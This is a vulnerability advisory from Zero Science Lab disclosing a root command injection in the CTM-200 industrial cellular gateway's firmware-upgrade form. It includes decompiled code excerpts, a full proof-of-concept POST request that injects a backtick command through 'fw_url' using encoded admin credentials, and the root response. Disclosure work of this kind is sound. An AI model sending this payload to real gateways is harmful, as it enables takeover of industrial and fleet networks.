Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection Vendor: Cypress Solutions Inc. Product web page: https://www.cypress.bc.ca Affected version: 2.7.1.5659 2.0.5.3356-184 Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications. The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site office and SCADA communications. Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to the wget command in /usr/bin/cmdmain ELF binary. ================================================================================================ /www/cgi-bin/webif/ctm-config-upgrade.sh: ----------------------------------------- 136: if ! empty "$FORM_install_fw_url"; then 137: echo "" 138: echo "
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
"
139:                 cmd upgradefw "$FORM_fw_url"
140:                 unset FORM_install_fw_url FORM_submit
141:                 echo "

Done." 142: fi ================================================================== cmdmain (ELF): memset(&DAT_0003bd1c,0,0x80); make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c); sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8), *(undefined4 *)(iParm2 + 8)); ctmsys(local_184); sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8)); iVar3 = ctm_fopen(local_184,"r"); if (iVar3 == 0) { uVar5 = *(undefined4 *)(iParm2 + 8); __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &"; goto LAB_0001f4a8; } ctm_fclose(); memset(local_184,0,0x100); sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8), *(undefined4 *)(iParm2 + 8)); ctmsys(local_184); ================================================================= cmd (ELF): while (sVar1 = strlen(__s2), uVar7 < sVar1) { __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2); __s2 = *ppcVar8; uVar7 = uVar7 + 1; } uStack180 = 0x7273752f; uStack176 = 0x6e69622f; uStack172 = 0x646d632f; uStack168 = 0x6d632f73; uStack164 = 0x69616d64; uStack160 = 0x6e; uStack159 = 0; iVar2 = execv((char *)&uStack180,ppcParm2); ================================================================================================ Tested on: GNU/Linux 2.6.32.25 (arm4tl) BusyBox v1.15.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5687 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php 21.09.2021 -- PoC POST request: ----------------- POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1 Host: 192.168.1.100 Connection: keep-alive Content-Length: 611 Cache-Control: max-age=0 Authorization: Basic YWRtaW46Q2hhbWVsZW9u Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cookie: style=null sec-gpc: 1 ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="submit" 1 ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="upgradefile"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="fw_url" `id` ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="install_fw_url" Start Firmware Upgrade from URL ------WebKitFormBoundaryZlABvwQnpLtpe9mM Content-Disposition: form-data; name="pkgurl" ------WebKitFormBoundaryZlABvwQnpLtpe9mM-- Response: --------- HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Pragma: no-cache ... ... Firmware Management Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway! Saving configuration ... downloading firmware image: gid=0(root)/uid=0(root).tar found image: extracting image files Verifying checksum of downloaded firmware image Image checksum failed OK Done. ... ...
Proceed Changes